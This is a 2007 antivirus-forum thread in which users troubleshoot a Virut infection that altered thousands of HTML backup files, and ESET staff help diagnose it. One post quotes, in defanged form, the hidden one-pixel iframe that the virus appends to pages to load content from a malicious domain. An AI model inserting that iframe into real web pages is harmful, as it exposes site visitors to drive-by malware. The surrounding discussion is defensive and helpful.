Virut.NAM

Discussion in 'NOD32 version 2 Forum' started by marky9074, Oct 17, 2007.

Thread Status:
Not open for further replies.
  1. marky9074

    marky9074 Registered Member

    Joined:
    Oct 16, 2007
    Posts:
    15
    Virut.NAM [solved]

    Hi there,

    Posted in a couple of other threads about this, but see after a search there is not any information and started a new thread.

    I found this last night and after a complete Nod32 scan it seems like it wants to delete 13728 html files...

    I rebooted into a PE shell and the files looked OK, so assumed they could be cleaned.

    Installed Kaspersky this morning which has gone through and disinfected the files, and reports that all is well...

    Nod32 however is now reporting that there are still 10000+ infected files.

    Kaspersky says it is all OK....

    So, I am at a loss what to do...

    I've only seen two references on this, one the same as me, but a restore fixed him ok. The other was a mention on how this virus 'slipped under the Nod32 radar'.

    I have ten years plus work backed up to removable disks, and ghost images, of which it appears they are all infected...

    Any help would be much appreciated.

    Mark
     
    Last edited: Oct 19, 2007
  2. Blackspear

    Blackspear Global Moderator

    Joined:
    Dec 2, 2002
    Posts:
    15,115
    Location:
    Gold Coast, Queensland, Australia
    Hi there, the Virut family of viruses uses polymorphism to hide from all antivirus protection, it infects executable files. File infection makes it very hard to repair a system that has been infected. I would strongly recommend rebuilding the system from backups.

    Windows can be rebuilt as described in the following link: http://www.informationweek.com/showArticle.jhtml?articleID=189400897 or failing this a format of the system will be required.

    Cheers :D
     
  3. marky9074

    marky9074 Registered Member

    Joined:
    Oct 16, 2007
    Posts:
    15
    But I don't understand...the only thing that has been affected is html files? My system is OK, I have a backup of that at various stages, it is just my data. Basically every html file on my disk is being flagged as a virus...

    Can I submit one of these files to Eset?

    Every backup I have of my 'data' has got these flagged changed files.
     
  4. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    Virut is very nasty. I have seen it to modify a lot of files into malware.
    Did u try to upload some of these files to joti of virus total to see what other AVs say about them.
     
  5. marky9074

    marky9074 Registered Member

    Joined:
    Oct 16, 2007
    Posts:
    15
    This is on a Vista Ultimate installation with Nod32, Spybot S&D, Ad-Aware etc. The system is always clean, as I restore the ghost image, install MS updates, and AV definitions, then backup again.
     
  6. marky9074

    marky9074 Registered Member

    Joined:
    Oct 16, 2007
    Posts:
    15
  7. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    Sorry as I have no other ideas ATM.
     
  8. i_kenefick

    i_kenefick Registered Member

    Joined:
    Nov 29, 2005
    Posts:
    135
    Location:
    Cork, Ireland.
    Back up files, reinstall windows. I think this is only recommended action at this time.
     
  9. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    ya! I think so.
     
  10. marky9074

    marky9074 Registered Member

    Joined:
    Oct 16, 2007
    Posts:
    15
    There is nothing wrong with windows, it is a clean install that has been restored from a ghost image. It is my data that needs to be recovered...these are already corrupt. I couldn't care less about windows, its retrieval of my html files that are paramount...
     
  11. Jdeane

    Jdeane Eset Staff

    Joined:
    Jul 18, 2007
    Posts:
    82
    Location:
    UK
  12. marky9074

    marky9074 Registered Member

    Joined:
    Oct 16, 2007
    Posts:
    15
    Cheers Jon,

    Just got a reply from Eset....
     
  13. marky9074

    marky9074 Registered Member

    Joined:
    Oct 16, 2007
    Posts:
    15
    Sent some files to Eset...

    Just to clarify the above, Kaspersky only fixed about 3000 of the 13000 reported threats. I did run Bittdefender as well, but that only pulled out a handful as well.

    Of all the products I have tried, Nod32 is actually reporting the most infections, so in all honesty it probably is the better product. Its just a shame it did not detect it at source when it arrived....

    I have had a bullet proof system for years now, and it is a real pain this happening. I guess having it bullet proof has meant that I have become complacent with regular scans etc. Saying that though it would not have made any difference if it was already infected.

    Can anyone elaborate on the 'went under the radar comment'? Sounds like it was some time before this was added to the definitions list...

    Thanks everyone for your help. Have sent some more files to Eset....hopefully they will come up with something, or will have to start seeing what I have backed up to DVD....

    It appears backing up to removable disks is not such a good idea after all! Shame I don't have a spare 3592 drive knocking around LOL!

    Mark
     
  14. marky9074

    marky9074 Registered Member

    Joined:
    Oct 16, 2007
    Posts:
    15
    Just had a reply from the very helpful Dan @ Eset.

    He says that this appends the following to html files...

    <iframe src="hxxp://ntkrnlpa.info/cr/?i=1" width=1 height=1></iframe>

    Replacing the xx with tt of course!

    After checking my files, it is indeed this. I have asked if there is a simple fix to this, but its looking good...!

    Mark
     
  15. marky9074

    marky9074 Registered Member

    Joined:
    Oct 16, 2007
    Posts:
    15
  16. Niklass

    Niklass Registered Member

    Joined:
    Sep 12, 2007
    Posts:
    11
    Location:
    Buenos Aires, Argentina

    Do you know what this script does? :eek:
     
  17. marky9074

    marky9074 Registered Member

    Joined:
    Oct 16, 2007
    Posts:
    15
    The iframe element creates an inline frame (in html code) that contains another document
     
  18. ossie686

    ossie686 Registered Member

    Joined:
    Oct 28, 2007
    Posts:
    1
    Hi Mark,

    I am new to this forum, please excuse my ignorance.

    I have the same problem with the iframe you mentioned, being inserted into all the html, asp and php files.
    After you have performed the search/replace on all the affected htm, asp and php files, did it completely resolve your problem.

    Ossie
     
Thread Status:
Not open for further replies.